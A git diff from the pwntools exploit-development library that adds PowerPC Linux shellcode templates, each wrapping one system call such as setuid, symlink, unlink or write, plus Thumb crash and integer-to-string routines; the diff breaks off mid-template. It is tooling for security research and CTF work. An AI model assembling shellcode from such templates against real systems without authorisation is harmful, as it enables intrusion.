a/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm new file mode 100644 index 000000000..7c7a8ad43 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm new file mode 100644 index 000000000..f71796a2e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm new file mode 100644 index 000000000..bc6962b82 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm new file mode 100644 index 000000000..21c4cce11 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm b/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm new file mode 100644 index 000000000..ebfdf5307 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm new file mode 100644 index 000000000..8246f9a1a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm new file mode 100644 index 000000000..da07a405c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm new file mode 100644 index 000000000..4ff05a36e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/signal.asm b/pwnlib/shellcraft/templates/powerpc/linux/signal.asm new file mode 100644 index 000000000..44d63bc1c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm new file mode 100644 index 000000000..42d075fbe --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm new file mode 100644 index 000000000..77b8b8429 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm new file mode 100644 index 000000000..2032a6144 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm new file mode 100644 index 000000000..aa0a684aa --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/splice.asm b/pwnlib/shellcraft/templates/powerpc/linux/splice.asm new file mode 100644 index 000000000..b2a32ef87 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stat.asm b/pwnlib/shellcraft/templates/powerpc/linux/stat.asm new file mode 100644 index 000000000..670f8c7f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm new file mode 100644 index 000000000..11b9c43e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stime.asm b/pwnlib/shellcraft/templates/powerpc/linux/stime.asm new file mode 100644 index 000000000..de081edf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stty.asm b/pwnlib/shellcraft/templates/powerpc/linux/stty.asm new file mode 100644 index 000000000..d4467359a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm new file mode 100644 index 000000000..ddc85f8b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm new file mode 100644 index 000000000..d9e3cbf8d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sync.asm b/pwnlib/shellcraft/templates/powerpc/linux/sync.asm new file mode 100644 index 000000000..e3c78ee77 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm new file mode 100644 index 000000000..0b0edb179 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm b/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm new file mode 100644 index 000000000..ece30909a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/tee.asm b/pwnlib/shellcraft/templates/powerpc/linux/tee.asm new file mode 100644 index 000000000..b386ae7c2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/time.asm b/pwnlib/shellcraft/templates/powerpc/linux/time.asm new file mode 100644 index 000000000..105957642 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm new file mode 100644 index 000000000..3d8591be5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm new file mode 100644 index 000000000..5c22d67cc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm new file mode 100644 index 000000000..779197b72 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm new file mode 100644 index 000000000..b91c50bda --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm new file mode 100644 index 000000000..ca8aff447 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm b/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm new file mode 100644 index 000000000..df66ae797 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm b/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm new file mode 100644 index 000000000..c8f320765 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm new file mode 100644 index 000000000..80be80bb8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/umask.asm b/pwnlib/shellcraft/templates/powerpc/linux/umask.asm new file mode 100644 index 000000000..2d40040b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/uname.asm b/pwnlib/shellcraft/templates/powerpc/linux/uname.asm new file mode 100644 index 000000000..17520f3af --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm new file mode 100644 index 000000000..e48a4d034 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm new file mode 100644 index 000000000..15750eb17 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm b/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm new file mode 100644 index 000000000..98a161f26 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm b/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm new file mode 100644 index 000000000..0c2df869f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utime.asm b/pwnlib/shellcraft/templates/powerpc/linux/utime.asm new file mode 100644 index 000000000..ec50e5c9d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm b/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm new file mode 100644 index 000000000..7d3d28bc8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm b/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm new file mode 100644 index 000000000..06b86ad4f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm b/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm new file mode 100644 index 000000000..5ebdde46a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm b/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm new file mode 100644 index 000000000..8f7b3d7de --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm b/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm new file mode 100644 index 000000000..6347ae45a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm b/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm new file mode 100644 index 000000000..cd6b127fc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm b/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm new file mode 100644 index 000000000..3a8892f5d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm b/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm new file mode 100644 index 000000000..14725ecdf --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/write.asm b/pwnlib/shellcraft/templates/powerpc/linux/write.asm new file mode 100644 index 000000000..b19fd67a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/writev.asm b/pwnlib/shellcraft/templates/powerpc/linux/writev.asm new file mode 100644 index 000000000..8e7821616 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/thumb/crash.asm b/pwnlib/shellcraft/templates/thumb/crash.asm new file mode 100644 index 000000000..1bb9e70c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/crash.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft.thumb import mov %> +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) < 0 + True + + pop {r0-r12,lr} + ldr sp, [sp, 64] + bx r1 diff --git a/pwnlib/shellcraft/templates/thumb/itoa.asm b/pwnlib/shellcraft/templates/thumb/itoa.asm new file mode 100644 index 000000000..0a2c5813b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/itoa.asm @@ -0,0 +1,75 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.thumb import mov, pushstr, udiv_10, setregs +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. Uses registers r0-r5. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.thumb.mov('r0', 0xdeadbeef) + >>> sc += shellcraft.thumb.itoa('r0') + >>> sc += shellcraft.thumb.linux.write(1, 'sp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='sp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') +one_char = common.label('one_char') +assert v in registers.thumb +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='sp': + sub sp, sp, 0x10 +%endif +## REGISTER USAGE +## +## r0: Value (also used in udiv_10) +## r1: Used in udiv_10 +## r2: Used in udiv_10 +## r3: Length of string, current character +## r4: Buffer pointer +## r5: Remainder + ${setregs({'r0': v, + 'r3': 0, + 'r4': buffer})} +## 